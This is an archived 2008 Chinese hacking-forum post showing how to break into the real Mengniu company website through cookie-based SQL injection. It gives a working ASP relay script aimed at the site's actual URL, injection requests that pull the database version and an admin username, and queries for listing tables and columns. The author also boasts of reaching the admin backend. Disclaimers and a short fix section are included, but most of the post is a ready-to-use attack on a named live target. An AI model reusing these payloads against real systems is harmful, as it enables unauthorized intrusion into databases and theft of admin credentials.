【3.A.S.T】网络安全爱好者's Archiver

黑客学习

平湖秋月 发表于 2008-9-20 19:54

蒙牛真牛

[size=4]三鹿网站被黑.  [/size][size=4]蒙牛被黑.[/size][size=4]全都是SQL注入..  [/size]
[size=4]今天对蒙牛,伊利网站简单检测了下,均存在漏洞,只是懒的研究....懒的研究..这里只说下蒙牛的漏洞所在和修补方法[/size]
[size=4]此文只限和广大网络安全爱好者进行学习交流,[color=#ff0000][b]本文纯属周末无聊,请大侠们一笑置之,无须理会.[/b][/color][/size]
[b]本文仅限学习交流使用,利用该文造成任何破坏或触犯法律的事,均与本人无关!!![/b]
[size=4]呵呵  一大堆废话呐  还是赶快进入正题吧!![/size]
[size=4][/size]
[size=4]进入蒙牛网站,我们会看到一个搜索框...想必大家都知道这搜索框一般都是好东西.. 输入1单引号,如fuck' 提交..[/size]
[size=4]错误:0x80040E14
描述:[Microsoft][ODBC SQL Server Driver][SQL Server]第 1 行: '%' 附近有语法错误。[/size]
[size=4]这里我们不管他 不过你喜欢的话可以使用搜索型注入试试看呐,我们这里现在主要说一个更严重的漏洞.[/size]
[size=4]该程序使用通用防注入过滤了地址栏提交的单引号,如:[/size]
[url=http://www.mengniu.com.cn/qywh_mnqywh.asp?IID=11][size=4][color=#0000ff]http://www.mengniu.com.cn/qywh_mnqywh.asp?IID=11'[/color][/size][/url]
[size=4]是不可以注入的.但程序员在处理时,仅使用了request("iid")来获取数据,这样造成cookies注入的存在.[/size]
[size=4]为了注入方便,简单写了个利用cookies注入的小程序,基本原理如下:[/size]
[size=4]Str="iid="&escape(request("FK"))   
Url="[/size][url=http://www.mengniu.com.cn/qywh_mnqywh.asp][size=4][color=#0000ff]http://www.mengniu.com.cn/qywh_mnqywh.asp[/color][/size][/url][size=4]"   
response.write PostData(Url,Str)   
   
Function PostData(PostUrl,PostCok)   
Dim Http   
Set Http = Server.CreateObject("msxml2.serverXMLHTTP")   
With Http   
   
.Open "GET",PostUrl,False   
.SetRequestHeader "Cookie",PostCok   
.Send   
PostData = .ResponseBody   
End With   
Set Http = Nothing   
PostData =bytes2BSTR(PostData)   
End Function [/size]
[size=4]Function bytes2BSTR(vIn)   
Dim strReturn   
Dim I, ThisCharCode, NextCharCode   
strReturn = ""   
For I = 1 To LenB(vIn)   
ThisCharCode = AscB(MidB(vIn, I, 1))   
If ThisCharCode < &H80 Then   
strReturn = strReturn & Chr(ThisCharCode)   
Else   
NextCharCode = AscB(MidB(vIn, I + 1, 1))   
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))   
I = I + 1   
End If   
Next   
bytes2BSTR = strReturn   
End Function[/size]
[size=4][/size]
[size=4]OK .我们来试试[/size]
[url=http://localhost/f.asp?fk=11][size=4][color=#0000ff]http://localhost/f.asp?fk=11'[/color][/size][/url]
[size=4]返回[/size]
[size=4]> 企业文化> 蒙牛企业文化 > 错误:0x80040E14
描述:[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' 之前有未闭合的引号。[/size]
[size=4]对了,这样就方便多了嘛..[/size]
[size=4]继续试试?[/size]
[size=4]f.asp?fk=11%20and%201=([/size][email=select%20@@version][size=4][color=#0000ff]select%20@@version[/color][/size][/email][size=4])[/size]
[size=4]企业文化> 蒙牛企业文化 > 错误:0x80040E07
描述:[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.2050 (Intel X86) Mar 7 2008 21:29:56 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' 转换为数据类型为 int 的列时发生语法错误。[/size]
[size=4]中间省略..[/size]
[url=http://localhost/f.asp?fk=11%20and%201=(select%20top%201%20SysU_Usernaem%20from%20sysa_admin][size=4][color=#0000ff]http://localhost/f.asp?fk=11%20and%201=(select%20top%201%20SysU_Usernaem%20from%20sysa_admin[/color][/size][/url][size=4])[/size]
[size=4]> 企业文化> 蒙牛企业文化 > 错误:0x80040E07
描述:[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'admin' 转换为数据类型为 int 的列时发生语法错误。[/size]
[size=4][/size]
[size=4]剩下的大家都知道怎么做了吧..[/size]
[size=4]这帖子没有什么技术含量,得到的[/size][size=4]权限很低..只能改改数据传传木马,呵呵大家不要乱来呐,:handshake :handshake :handshake :handshake :handshake [/size][size=4][img]http://www.efsys.cn/fckeditor/editor/images/smiley/msn/tounge_smile.gif[/img][/size]
[size=4][/size]
[size=4]补充一下:[/size]
[size=4]知道后台么?[/size]
[size=4]你人品好,我就告诉你..严禁破坏,否则去坐牢,别拉我...我是无辜的哦...[/size]
[size=4][/size]
[size=4][/size]
该漏洞修补办法:
[size=4]请对代码中的request对象进行检查,如果存在[/size]
[size=4]request("iid")等类似用法,请使用clng(request.QueryString("iid"))[/size]
[size=4]对于首页搜索型提交的字符,请使用replace(request.form("newstr"),"'","''")[/size]
[size=4]即可修复此漏洞.[/size]
[size=4][/size]
[size=4][/size]
[size=4]郑重声明:此文章仅限学习和交流,利用本文造成一切后果及法律责任请自负!!!![/size]
[size=4]我只进后台,但我没有修改数据呵呵 老实人呐[/size]
[size=4][/size]
[color=black]哎! 别问怎么知道他的管理员表名和字段名的?这种问题太高了:L :L [/color]

[color=black]SQL库利用方法:
列表名:
select name from sysobjects where xtype='U'
列字段:
select name from syscolumns where id=object_id('表名')

具体用法请自行研究吧.:handshake [/color]

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.